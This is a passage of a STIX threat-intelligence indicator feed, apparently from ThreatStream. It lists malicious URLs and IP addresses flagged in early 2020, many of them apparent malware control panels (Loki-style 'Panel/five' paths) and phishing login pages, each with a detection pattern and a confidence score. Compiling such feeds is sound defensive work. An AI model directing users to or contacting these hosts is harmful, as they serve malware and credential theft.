CyberCrime","id":"indicator--cc172be8-7e67-489c-8bd8-8e9ffc11a944","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-29T03:00:29.782Z","name":"mal_url: http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:00:29.782Z"} +{"created":"2020-01-29T03:00:38.132Z","description":"TS ID: 55266538988; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6cb1c4c4-93cb-4ad9-b176-e2a47febafac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-29T03:00:38.132Z","name":"mal_url: http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login']","type":"indicator","valid_from":"2020-01-29T03:00:38.132Z"} +{"created":"2020-01-29T03:00:38.721Z","description":"TS ID: 55266538999; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--42f95e09-bad2-4055-bf72-fd3d1f26a173","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:00:38.721Z","name":"mal_url: http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:00:38.721Z"} +{"created":"2020-01-29T03:00:51.527Z","description":"TS ID: 55266539012; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--b9eafbc4-77e3-4b9b-bd34-a15681f0bbec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-29T03:00:51.527Z","name":"mal_url: http://corpcougar.com/me/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/me/32/panel/admin.php']","type":"indicator","valid_from":"2020-01-29T03:00:51.527Z"} +{"created":"2020-01-29T03:01:05.442Z","description":"TS ID: 55266539004; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--9a6acfec-ffa7-47c7-8176-7dbaca7b379f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:01:05.442Z","name":"mal_url: http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:01:05.442Z"} +{"created":"2020-01-29T03:01:13.933Z","description":"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime","id":"indicator--5384d504-8760-4255-8daa-dd156dc302d0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-29T03:01:13.933Z","name":"mal_ip: 78.128.76.165","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '78.128.76.165']","type":"indicator","valid_from":"2020-01-29T03:01:13.933Z"} +{"created":"2020-01-29T03:01:31.192Z","description":"TS ID: 55266539003; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--56b347c9-58c9-48d5-a015-2d561d855af2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:01:31.192Z","name":"mal_url: http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:01:31.192Z"} +{"created":"2020-01-29T03:01:37.815Z","description":"TS ID: 55266538992; iType: mal_url; State: active; Org: Exa Bytes Network Sdn.Bhd.; Source: CyberCrime","id":"indicator--840739fb-44ae-42f0-805f-422b38422325","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-29T03:01:37.815Z","name":"mal_url: http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php']","type":"indicator","valid_from":"2020-01-29T03:01:37.815Z"} +{"created":"2020-01-29T03:01:49.96Z","description":"TS ID: 55266539011; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--9ab8a69c-5b95-4fd6-b189-11d90ee54834","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-29T03:01:49.96Z","name":"mal_url: http://rgmechanics.fun/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rgmechanics.fun/panel/admin.php']","type":"indicator","valid_from":"2020-01-29T03:01:49.96Z"} +{"created":"2020-01-29T03:02:14.284Z","description":"TS ID: 55266539013; iType: mal_url; State: active; Org: Lir.bg EOOD; Source: CyberCrime","id":"indicator--96051c6b-3648-43ba-b579-735bd6342ec2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-29T03:02:14.284Z","name":"mal_url: http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:14.284Z"} +{"created":"2020-01-29T03:02:24.081Z","description":"TS ID: 55266539001; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--d76d300b-07b7-4e9b-b7f1-9e6c0def6a6b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:02:24.081Z","name":"mal_url: http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:24.081Z"} +{"created":"2020-01-29T03:02:31.573Z","description":"TS ID: 55266539009; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--3c61c714-aab6-46e2-abfd-389628870d7d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-29T03:02:31.573Z","name":"mal_url: http://v200598.hosted-by-vdsina.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://v200598.hosted-by-vdsina.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-01-29T03:02:31.573Z"} +{"created":"2020-01-29T03:02:31.605Z","description":"TS ID: 55266539007; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--3c9a39df-b4f3-4529-bfd8-d8b40801e555","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:02:31.605Z","name":"mal_url: http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:31.605Z"} +{"created":"2020-01-29T03:02:41.021Z","description":"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime","id":"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-29T03:02:41.021Z","name":"mal_ip: 217.29.57.178","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.29.57.178']","type":"indicator","valid_from":"2020-01-29T03:02:41.021Z"} +{"created":"2020-01-29T03:02:42.284Z","description":"TS ID: 55266539010; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--e34dc439-4789-4d5a-b7dc-471fb473f4a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-29T03:02:42.284Z","name":"mal_url: http://v178903.hosted-by-vdsina.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://v178903.hosted-by-vdsina.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-01-29T03:02:42.284Z"} +{"created":"2020-01-29T03:02:42.335Z","description":"TS ID: 55266538994; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--a30fe926-53b8-43fe-a792-8ecd41071dd7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-29T03:02:42.335Z","name":"mal_url: http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:42.335Z"} +{"created":"2020-01-29T03:02:42.367Z","description":"TS ID: 55266538986; iType: mal_url; State: active; Org: Eonix Corporation; Source: CyberCrime","id":"indicator--0005f77c-327b-4b69-8046-777efe95361d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-29T03:02:42.367Z","name":"mal_url: http://microsoftrenat.site/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://microsoftrenat.site/index.php']","type":"indicator","valid_from":"2020-01-29T03:02:42.367Z"} +{"created":"2020-01-29T03:02:48.869Z","description":"TS ID: 55266539005; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--2ef4b932-5434-49f4-8255-a70de96893d8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:02:48.869Z","name":"mal_url: http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:48.869Z"} +{"created":"2020-01-29T03:02:48.897Z","description":"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-29T03:02:48.897Z","name":"mal_ip: 31.31.196.78","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '31.31.196.78']","type":"indicator","valid_from":"2020-01-29T03:02:48.897Z"} +{"created":"2020-01-30T02:58:32.284Z","description":"TS ID: 55270319168; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--8da10219-9eb1-4963-8889-587598e511cd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-01-30T02:58:32.284Z","name":"mal_url: http://www.cpadeer.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://www.cpadeer.com/login']","type":"indicator","valid_from":"2020-01-30T02:58:32.284Z"} +{"created":"2020-01-31T02:19:29.045Z","description":"TS ID: 55274447486; iType: mal_url; State: active; Org: SingleHop LLC; Source: CyberCrime","id":"indicator--093bf827-0d84-4b54-9d62-dffffd0a619b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-31T02:19:29.045Z","name":"mal_url: http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-31T02:19:29.045Z"} +{"created":"2020-01-31T02:22:09.726Z","description":"TS ID: 55274447484; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--51d4eb13-adf7-4de1-a3f0-106d343ad560","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-31T02:22:09.726Z","name":"mal_url: http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-31T02:22:09.726Z"} +{"created":"2020-02-01T02:03:02.79Z","description":"TS ID: 55277443309; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--a5926161-953c-4763-9d10-0c5e10bcd4e4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:03:02.79Z","name":"mal_url: http://marubemi.com/owen/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://marubemi.com/owen/admin.php']","type":"indicator","valid_from":"2020-02-01T02:03:02.79Z"} +{"created":"2020-02-01T02:03:07.047Z","description":"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-28"],"modified":"2020-02-01T02:03:07.047Z","name":"mal_ip: 62.76.41.133","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '62.76.41.133']","type":"indicator","valid_from":"2020-02-01T02:03:07.047Z"} +{"created":"2020-02-01T02:03:48.038Z","description":"TS ID: 55277443373; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--8494f340-0964-47f0-ba09-78fe0b76eb34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:03:48.038Z","name":"mal_url: http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:03:48.038Z"} +{"created":"2020-02-01T02:03:48.079Z","description":"TS ID: 55277443242; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f051e10a-76c9-4f14-9fa3-9dbccc65c26f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:03:48.079Z","name":"mal_url: http://farzanatradings.com/maindon/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farzanatradings.com/maindon/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:03:48.079Z"} +{"created":"2020-02-01T02:04:16.392Z","description":"TS ID: 55277443446; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--79c8f52b-f134-4e02-ad7a-6169063c8fba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:04:16.392Z","name":"mal_url: http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:04:16.392Z"} +{"created":"2020-02-01T02:04:21.636Z","description":"TS ID: 55277443452; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--7338fc3d-2a1f-4583-b34d-eb76912a43e6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-01T02:04:21.636Z","name":"mal_url: http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:04:21.636Z"} +{"created":"2020-02-01T02:04:21.676Z","description":"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1f9e0571-119c-448a-8656-fec49c9c058a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-01T02:04:21.676Z","name":"mal_url: http://5.188.60.23/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.23/login']","type":"indicator","valid_from":"2020-02-01T02:04:21.676Z"} +{"created":"2020-02-01T02:04:21.705Z","description":"TS ID: 55277443078; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--d1161e31-f661-469c-b206-84e1d416e577","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-01T02:04:21.705Z","name":"mal_url: http://gosdick.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gosdick.beget.tech/login']","type":"indicator","valid_from":"2020-02-01T02:04:21.705Z"} +{"created":"2020-02-01T02:04:21.745Z","description":"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-17"],"modified":"2020-02-01T02:04:21.745Z","name":"mal_ip: 185.22.155.46","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.22.155.46']","type":"indicator","valid_from":"2020-02-01T02:04:21.745Z"} +{"created":"2020-02-01T02:05:07.232Z","description":"TS ID: 55277443523; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--0068cb9c-0bdf-44a8-9563-5006e0c38921","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-01T02:05:07.232Z","name":"mal_url: http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:05:07.232Z"} +{"created":"2020-02-01T02:05:07.274Z","description":"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-01T02:05:07.274Z","name":"mal_url: http://92.63.197.156/tspir/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.156/tspir/index.php']","type":"indicator","valid_from":"2020-02-01T02:05:07.274Z"} +{"created":"2020-02-01T02:06:07.042Z","description":"TS ID: 55277443220; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--b8e709b0-7eb8-4b2b-94f0-e21c4138cf9b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-01T02:06:07.042Z","name":"mal_url: http://vware.duckdns.org/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://vware.duckdns.org/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:06:07.042Z"} +{"created":"2020-02-01T02:06:15.505Z","description":"TS ID: 55277443605; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--10e62d11-dbc5-4d39-badf-574aaab2d0f5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-01T02:06:15.505Z","name":"mal_url: http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:06:15.505Z"} +{"created":"2020-02-01T02:06:15.674Z","description":"TS ID: 55277443276; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--a84ddb39-c02c-44cc-bac3-0056c279454c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:06:15.674Z","name":"mal_url: http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:06:15.674Z"} +{"created":"2020-02-01T02:06:38.684Z","description":"TS ID: 55277443190; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--f667d2dd-f6df-4aa4-bd7b-8b7f3e98fa0a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-01T02:06:38.684Z","name":"mal_url: http://bubble2.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bubble2.site/login']","type":"indicator","valid_from":"2020-02-01T02:06:38.684Z"} +{"created":"2020-02-01T02:06:38.733Z","description":"TS ID: 55277442690; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--a81a2408-b11b-4b28-a5b6-ffec11942d62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-02-01T02:06:38.733Z","name":"mal_url: http://144.202.96.212/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://144.202.96.212/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:06:38.733Z"} +{"created":"2020-02-01T02:06:49.292Z","description":"TS ID: 55277443216; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--4a414cbe-3e02-48b9-84fb-103ed9961e6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-01T02:06:49.292Z","name":"mal_url: http://papafrog.beget.tech/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://papafrog.beget.tech/index.php']","type":"indicator","valid_from":"2020-02-01T02:06:49.292Z"} +{"created":"2020-02-01T02:07:27.633Z","description":"TS ID: 55277443028; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--27f66dbf-4ce9-4616-aef1-c6ab9f224ecb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:07:27.633Z","name":"mal_url: http://t917659s.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://t917659s.beget.tech/login']","type":"indicator","valid_from":"2020-02-01T02:07:27.633Z"} +{"created":"2020-02-01T02:07:36.513Z","description":"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime","id":"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-01T02:07:36.513Z","name":"mal_url: http://185.136.159.206/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.136.159.206/login']","type":"indicator","valid_from":"2020-02-01T02:07:36.513Z"} +{"created":"2020-02-01T02:08:09.833Z","description":"TS ID: 55277443560; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--7d803ca2-4e7d-414e-9693-854d08c49bb6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-01T02:08:09.833Z","name":"mal_url: http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:08:09.833Z"} +{"created":"2020-02-01T02:08:09.939Z","description":"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime","id":"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-01T02:08:09.939Z","name":"mal_url: http://94.177.123.112/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.177.123.112/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-01T02:08:09.939Z"} +{"created":"2020-02-01T02:08:31.777Z","description":"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-01T02:08:31.777Z","name":"mal_ip: 47.241.1.46","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.241.1.46']","type":"indicator","valid_from":"2020-02-01T02:08:31.777Z"} +{"created":"2020-02-01T02:08:31.818Z","description":"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:08:31.818Z","name":"mal_ip: 95.163.212.79","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '95.163.212.79']","type":"indicator","valid_from":"2020-02-01T02:08:31.818Z"} +{"created":"2020-02-01T02:08:42.76Z","description":"TS ID: 55277443599; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--4c8f8d86-da50-48bb-a41b-8a002561315a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-01T02:08:42.76Z","name":"mal_url: http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:08:42.76Z"} +{"created":"2020-02-01T02:09:05.295Z","description":"TS ID: 55277443514; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--3639e6da-8159-4dd6-b928-b8189c29159f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-01T02:09:05.295Z","name":"mal_url: http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:09:05.295Z"} +{"created":"2020-02-01T02:09:13.398Z","description":"TS ID: 55277443134; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7d4bf98b-8fc2-427c-a08b-f432e43c1110","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-01T02:09:13.398Z","name":"mal_url: http://moonberry.pk/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://moonberry.pk/login']","type":"indicator","valid_from":"2020-02-01T02:09:13.398Z"} +{"created":"2020-02-01T02:09:49.804Z","description":"TS ID: 55277442688; iType: mal_url; State: active; Org: Choopa, LLC; Source: 